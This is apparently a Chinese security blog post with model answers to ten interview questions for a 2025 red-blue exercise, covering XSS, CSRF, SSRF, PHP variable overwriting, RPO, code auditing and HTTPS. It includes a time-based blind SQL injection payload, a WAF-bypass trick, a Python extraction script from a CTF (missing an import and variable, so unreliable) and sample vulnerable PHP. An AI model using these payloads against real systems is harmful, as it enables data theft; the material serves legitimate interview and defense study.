安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
?2025年HW(護網面試) 70
一、自我介紹
二、同源策略 & 三大漏洞對比解析
1. 同源策略(SOP)核心規則
2. 三大漏洞攻防對比
三、反射型XSS vs DOM型XSS
四、變量覆蓋漏洞高危函數(PHP示例)
五、RPO(Relative Path Overwrite)漏洞精解
攻擊原理
實戰場景
六、CTF經典題型解析:Web時間盲注
七、代碼審計核心方法論
八、CSRF防御三重機制
九、數據分析實戰經驗
十、HTTPS工作原理詳解
?2025年HW(護網面試) 70
1、自我介紹 2、講一講同源策略/SSRF/CSRF/XSS 3、反射型XSS和DOM型XSS的區別 4、變量覆蓋漏洞涉及的主要函數 5、對RPO漏洞的理解 6、講一道印象深刻的CTF題 7、講一講代碼[審計]()的思路 8、講一講csrf如何防御 9、有沒有做過[數據分析]() 10、https的工作原理
一、自我介紹
網絡安全高級工程師 | 5年攻防實戰經驗
- 核心領域:Web漏洞挖掘(主導審計50+系統)、SDL建設、紅藍對抗
- 技術標簽:PHP/JAVA代碼審計、自動化滲透工具開發、CVE-2024-*** 發現者
- 當前關注:AI賦能漏洞挖掘、云原生安全加固
二、同源策略 & 三大漏洞對比解析
1. 同源策略(SOP)核心規則
markdown| 對比項 | 同源判定條件 | 受限操作 | |--------------|----------------------------------|--------------------------| | 協議/域名/端口 | 三者完全一致 | Cookie/Storage訪問 | | 跨域限制 | 阻止讀取跨域資源 | AJAX請求、DOM操作 | | 例外機制 | CORS/JSONP/postMessage | 需顯式授權 |
2. 三大漏洞攻防對比
漏洞類型 攻擊原理 防御方案 典型案例 SSRF 偽造服務端請求內部系統(如 file:///etc/passwd
)白名單校驗、禁用危險協議、網絡隔離 云服務器元數據API泄露 CSRF 誘導用戶點擊惡意鏈接觸發身份操作 Anti-CSRF Token、SameSite=Strict 銀行轉賬篡改請求 XSS 注入惡意腳本到頁面執行 CSP策略、輸入輸出編碼、DOM Purify 存儲型XSS竊取用戶Cookie 💡 關聯風險:XSS可繞過SOP獲取頁面數據,SSRF可突破網絡邊界訪問內網。
三、反射型XSS vs DOM型XSS
mermaidgraph LR A[觸發方式] --> B[反射型XSS:惡意參數通過URL傳遞,服務端返回含攻擊代碼的頁面] A --> C[DOM型XSS:前端JS直接操作DOM樹注入代碼,不經過服務端] D[檢測重點] --> E[反射型:URL參數、HTTP頭輸出點] D --> F[DOM型:location.hash/document.write 等函數] G[防御差異] --> H[反射型:服務端輸出編碼] G --> I[DOM型:前端安全API(如textContent替代innerHTML)]
四、變量覆蓋漏洞高危函數(PHP示例)
四大危險函數及場景:
extract()
phpextract($_GET); // 直接覆蓋已有變量$auth if ($auth) { admin(); }
parse_str()
phpparse_str($input); // 輸入"auth=1"覆蓋變量
$$
動態變量phpforeach($_GET as $key => $val) { $$key = $val; // 輸入?userid=admin覆蓋權限 }
mb_parse_str()
phpmb_parse_str($_POST['data']); // 多字節版本同樣危險
🔥 加固方案:禁用
register_globals
、嚴格聲明變量作用域、使用$_REQUEST
白名單過濾。
五、RPO(Relative Path Overwrite)漏洞精解
攻擊原理
markdown1. 利用瀏覽器解析CSS相對路徑的差異: - 請求 `/page.php/ 惡意路徑?param=../../evil.css` 2. 服務器返回 `/page.php` 內容但URL路徑被篡改 3. 瀏覽器按篡改后的路徑加載CSS,將頁面內容當作CSS解析 4. 惡意CSS中注入JS代碼:`[color=red]{ background: url('javascript:alert(1)') }`
實戰場景
- 篡改靜態資源路徑實現XSS
- 竊取頁面敏感文本(CSS選擇器匹配敏感元素)
修復方案:使用絕對路徑引用資源、設置X-Content-Type-Options: nosniff
。
六、CTF經典題型解析:Web時間盲注
賽題:D^3CTF 2024 - SQL Time Maze
解題步驟:
- 探測注入點:
sqlid=1' AND IF(ASCII(SUBSTR(database(),1,1))>100, SLEEP(2), 0)--
- 二分法自動化腳本:
pythonimport requests for i in range(1,50): low, high = 32, 128 while low <= high: mid = (low+high)//2 payload = f"IF(ASCII(SUBSTR((SELECT flag FROM secret LIMIT 1),{i},1))>{mid}, SLEEP(2),0)" start = time.time() requests.get(f"/query?id=1' AND {payload}-- ") if time.time()-start > 2: low = mid+1 else: high = mid-1 flag += chr(low)
- 關鍵技巧:
- 繞過WAF:
/*!50000SLEEP(2)*/
- 加速:并發請求+位運算判斷
七、代碼審計核心方法論
五步深度審計流程:
- 入口定位:
- 路由解析(如Spring MVC的
@RequestMapping
)- 配置文件(
web.xml
/config.php
)- 危險函數追蹤:
markdown| 漏洞類型 | 關鍵函數/API | |------------|----------------------------------| | RCE | eval()/Runtime.exec() | | 文件操作 | FileInputStream()/copy() | | 反序列化 | readObject()/unserialize() |
- 數據流分析:
- 污點傳播:用戶輸入 → 過濾函數 → 危險函數
- 逆向回溯:
- 從
sink
點(如SQL執行函數)回溯至source
(如$_GET
)- 工具鏈整合:
- 靜態:Semgrep(自定義規則)、Fortify
- 動態:Xdebug + 參數篡改測試
八、CSRF防御三重機制
防御層 技術方案 適用場景 令牌驗證 服務端生成隨機Token綁定Session 關鍵操作(支付/改密) 同源檢測 校驗 Origin
/Referer
頭簡單請求快速攔截 瀏覽器機制 Cookie設置 SameSite=Strict
現代瀏覽器自動防御 ?? Token設計要點:一次性使用、綁定用戶會話、加密存儲。
九、數據分析實戰經驗
安全大數據分析平臺建設:
- 數據源:
- 30TB/日日志(WAF/NIDS/業務系統)
- 威脅情報(微步/ALPHA)
- 技術棧:
mermaigraph LR A[Flink實時流] --> B[攻擊行為聚類] C[ElasticSearch] --> D[日志檢索] E[Spark ML] --> F[異常流量檢測]
- 產出成果:
- APT攻擊溯源:挖礦木馬傳播路徑還原
- 0day預警:異常SQL請求模式捕獲Log4j2漏洞利用
十、HTTPS工作原理詳解
雙向安全通信流程:
mermaidsequenceDiagram Client->>Server: ClientHello (TLS版本+加密套件列表) Server->>Client: ServerHello (選定套件) + 證書 Client->>Client: 驗證證書鏈有效性 Client->>Server: 生成Pre-master密鑰(用證書公鑰加密) Server->>Server: 私鑰解密獲得Pre-master Note over Client,Server: 雙方基于Pre-master生成會話密鑰 Client->>Server: 加密傳輸應用數據(AES-GCM)
關鍵安全機制:
- 證書信任鏈:CA機構根證書 → 中間證書 → 域名證書
- 密鑰交換:ECDHE算法(前向保密)
- 防篡改:HMAC簽名校驗
- 抗重放:隨機數+時間戳